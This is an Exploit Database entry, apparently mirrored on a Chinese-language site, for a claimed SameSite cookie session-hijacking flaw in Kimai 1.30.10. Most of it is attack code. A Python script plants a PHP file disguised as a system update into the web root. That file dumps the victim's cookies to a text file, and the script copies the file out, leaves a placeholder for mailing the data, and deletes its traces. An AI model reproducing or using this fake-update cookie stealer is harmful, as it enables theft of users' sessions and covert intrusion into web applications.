Kimai-1.30.10 – SameSite Cookie-Vulnerability session hijacking

• Exploit Database
• 36 阅读

• 作者： nu11secur1ty
  日期： 2023-04-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51278/

• ## Exploit Title: Kimai-1.30.10 - SameSite Cookie-Vulnerability session hijacking
  ## Author: nu11secur1ty
  ## Date: 02.23.2023
  ## Vendor: https://www.kimai.org/
  ## Software: https://github.com/kimai/kimai/releases/tag/1.30.10
  ## Reference: https://www.thesslstore.com/blog/the-ultimate-guide-to-session-hijacking-aka-cookie-hijacking/
  ## Reference: https://portswigger.net/support/using-burp-to-hack-cookies-and-manipulate-sessions
  
  ## Description:
  The Kimai-1.30.10 is vulnerable to
  SameSite-Cookie-Vulnerability-session-hijacking.
  The attacker can trick the victim to update or upgrade the system, by
  using a very malicious exploit to steal his vulnerable cookie and get
  control of his session.
  
  STATUS: HIGH Vulnerability
  
  [+]Exploit:
  ## WARNING: The EXPLOIT IS FOR ADVANCED USERS!
  This is only one example:
  ```python
  #!/usr/bin/python
  import os
  import webbrowser
  import time
  
  webbrowser.open('https://pwnedhost.com/kimai-1.30.10/public/en/login')
  input("After you log in please press any key to continue...")
  os.system("copy Update.php
  C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\")
  time.sleep(3)
  webbrowser.open('https://pwnedhost.com/kimai-1.30.10/public/Update.php')
  time.sleep(3)
  os.system("copy
  C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\PoC.txt
  C:\\Users\\venvaropt\\Desktop\\Kimai-1.30.10\\PoC\\")
  # Your mail-sending code must be here ;)
  time.sleep(7)
  os.system("del C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\PoC.txt")
  os.system("del C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\Update.php")
  
  ```
  -----------------------------------------
  ```PHP
  <?php
  //echo '<pre>';
  //	print_r( $_COOKIE );
  //die();
  
  	$fp = fopen('PoC.txt', 'w');
  	fwrite($fp, print_r($_COOKIE, TRUE));
  	fclose($fp);
  	echo "DONE: Now you are already updated! Enjoy your system Kimai
  1.30.10 stable (Ayumi)";
  ?>
  ```
  
  ## Reproduce:
  [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kimai/2023/Kimai-1.30.10)
  
  ## Proof and Exploit:
  [href](https://streamable.com/md9fmr)
  
  ## Time spend:
  03:00:00
  
  
  -- 
  System Administrator - Infrastructure Engineer
  Penetration Testing Engineer
  Exploit developer at
  https://packetstormsecurity.com/https://cve.mitre.org/index.html and
  https://www.exploit-db.com/
  home page: https://www.nu11secur1ty.com/
  hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
  nu11secur1ty <http://nu11secur1ty.com/>
  
  
  -- 
  System Administrator - Infrastructure Engineer
  Penetration Testing Engineer
  Exploit developer at https://packetstormsecurity.com/
  https://cve.mitre.org/index.html
  https://cxsecurity.com/ and https://www.exploit-db.com/
  0day Exploit DataBase https://0day.today/
  home page: https://www.nu11secur1ty.com/
  hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
  nu11secur1ty <http://nu11secur1ty.com/>